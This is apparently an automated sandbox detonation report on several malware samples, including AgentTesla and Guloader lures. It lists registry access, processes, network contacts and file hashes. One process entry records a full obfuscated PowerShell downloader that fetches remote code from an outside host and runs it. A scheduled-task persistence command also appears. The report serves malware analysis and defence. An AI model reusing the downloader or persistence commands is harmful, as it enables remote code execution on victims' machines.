System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp"
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"{path}"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.knowunknow.com | udp |
| US | 104.18.217.221:80 | www.knowunknow.com | tcp |
| US | 8.8.8.8:53 | 221.217.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sarrosh.com | udp |
| US | 8.8.8.8:53 | www.apollorealtors.com | udp |
| NL | 212.32.237.92:80 | www.apollorealtors.com | tcp |
| US | 8.8.8.8:53 | 92.237.32.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.suddennnnnnnnnnnn02.xyz | udp |
| US | 8.8.8.8:53 | www.webdesigncharlestonsc.com | udp |
| US | 162.244.253.20:80 | www.webdesigncharlestonsc.com | tcp |
| US | 8.8.8.8:53 | 20.253.244.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cacaolixir.com | udp |
| US | 3.33.130.190:80 | www.cacaolixir.com | tcp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.avaxbridgeapes.com | udp |
| FR | 13.32.145.56:80 | www.avaxbridgeapes.com | tcp |
| US | 8.8.8.8:53 | 56.145.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.palmsugar.biz | udp |
| US | 8.8.8.8:53 | www.zvedaventeco.quest | udp |
| US | 8.8.8.8:53 | www.724ototamir.com | udp |
| US | 8.8.8.8:53 | www.tenlog001.xyz | udp |
| US | 8.8.8.8:53 | www.dazalogistics.com | udp |
| US | 76.223.105.230:80 | www.dazalogistics.com | tcp |
| US | 8.8.8.8:53 | 230.105.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | N/A | udp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp
| MD5 | 9c5f354653322ec06ab4ebb449e2437b |
| SHA1 | 375d5329debbebcf8688639c7ef7981aa77f5534 |
| SHA256 | 8c6ac426262941b59edd01a7e5999cc822f25e8ef4cd9bf5d40e63f00d32faf2 |
| SHA512 | a97317b55c144fdc08a91c69fef2d40098991ab13a45ceecbd75eabba357ec9f41612b5b1bcc7b4c8e27875b74a6e0ca7019ca8a610eaae2e9de7eb5223f6175 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe
"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | spa2o.com | udp |
| HR | 185.58.73.32:80 | spa2o.com | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240729-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe
"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"
Network
Files
\Users\Admin\AppData\Local\Temp\nsuF539.tmp\Math.dll
| MD5 | 85428cf1f140e5023f4c9d179b704702 |
| SHA1 | 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba |
| SHA256 | 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a |
| SHA512 | dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59 |
\Users\Admin\AppData\Local\Temp\nsuF539.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
144s
Max time network
153s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe
"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sync-shop.com | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
148s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | d6a8751247b907a05fe4c5e591a7329e |
| SHA1 | e04fa6f11939152ac76fc1f5e593ce5dae258319 |
| SHA256 | 1b3914a8e1640456acd4463618ecec0fa7ae9ddeae317220fa766be5f2974082 |
| SHA512 | 9ba04fa5148d0bcde255d723a2b9c0533b0c2bd996fe8d5221dfed146f90fac0e895395689530a935f31878b0f70b825cd0fab1ce0211aaeeaaae23844ecf51c |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4992 set thread context of 4440 | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.77.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EZ0496.exe.log
| MD5 | e50d61d6d5cec0d2c6b3fbf02b17af2d |
| SHA1 | fcf43f96e7389c27ee201fb00b65db01ca2cee40 |
| SHA256 | a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9 |
| SHA512 | 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 220
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | de643de789f31affa9257ebec8e9965e |
| SHA1 | 342b94a4511f76030be21621bbc0bf1129002eda |
| SHA256 | 02d7a3debe26df33a03ab55c4a9fa49befd762a4cd60780ba9717a1b670b97f7 |
| SHA512 | 8b3ec35f1e261c7b36ccdd24220f0acb14072536b91d9a65ec002bf44018ed6cc7f51ea6c0caad27172ea44b6036a865baa62743ce82dd4bc8ea8531574984c8 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-21 20:24
Reported
